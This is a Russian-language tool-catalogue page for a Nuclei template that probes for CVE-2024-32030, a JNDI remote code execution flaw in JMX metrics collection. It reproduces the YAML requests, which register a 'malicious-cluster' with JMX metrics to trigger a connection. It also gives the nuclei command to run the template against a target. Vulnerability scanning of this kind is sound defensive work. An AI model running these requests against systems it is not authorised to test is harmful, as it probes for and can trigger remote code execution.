Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-32030-Nuclei-Template | Kitploit
Инструменты/GitHubGitHub/huseyinstif/cve-2024-32030-nuclei-template
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubhuseyinstif/cve-2024-32030-nuclei-template

CVE-2024-32030-Nuclei-Template

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
12 лет назадЕщё не проверено

Шаблон Nuclei для CVE-2024-32030

Описание

Этот репозиторий содержит шаблон Nuclei для обнаружения уязвимости CVE-2024-32030. Эта уязвимость позволяет выполнять удалённый код через JMX Metrics Collection JNDI Resolution.

Детали уязвимости

  • ID: CVE-2024-32030
  • Название: JMX Metrics Collection JNDI RCE
  • Автор: Hüseyin TINTAŞ
  • Серьёзность: Критическая
  • Описание: Этот шаблон проверяет наличие уязвимости, пытаясь подключиться к вредоносному JMX-серверу.
  • Теги: cve, cve2024, jmx, rce, cve2024-32030

Шаблон

root@kitploit:~
id: CVE-2024-32030

info:
  name: CVE-2024-32030 JMX Metrics Collection JNDI RCE
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-32030 JMX Metrics Collection JNDI Resolution Remote Code Execution Vulnerability.
    This template checks for the presence of the vulnerability by attempting to connect to a malicious JMX server.
  tags: cve, cve2024, jmx, rce, cve2024-32030

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/clusters"
    headers:
      Content-Type: "application/json"
    body: |
      {
        "name": "malicious-cluster",
        "bootstrapServers": ["127.0.0.1:1718"],
        "metrics": {
          "type": "JMX",
          "port": 1718
        }
      }
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster added successfully"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster"
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster/metrics"
    matchers:
      - type: word
        part: body
        words:
          - "metrics"

Использование

Чтобы использовать этот шаблон, сохраните его как cve-2024-32030.yaml и запустите с помощью Nuclei:

root@kitploit:~
nuclei -t CVE-2024-32030.yaml -u http://target-server

Контакты

По любым вопросам или за дополнительной информацией вы можете связаться со мной через:

  • LinkedIn
  • Twitter
Скачать инструмент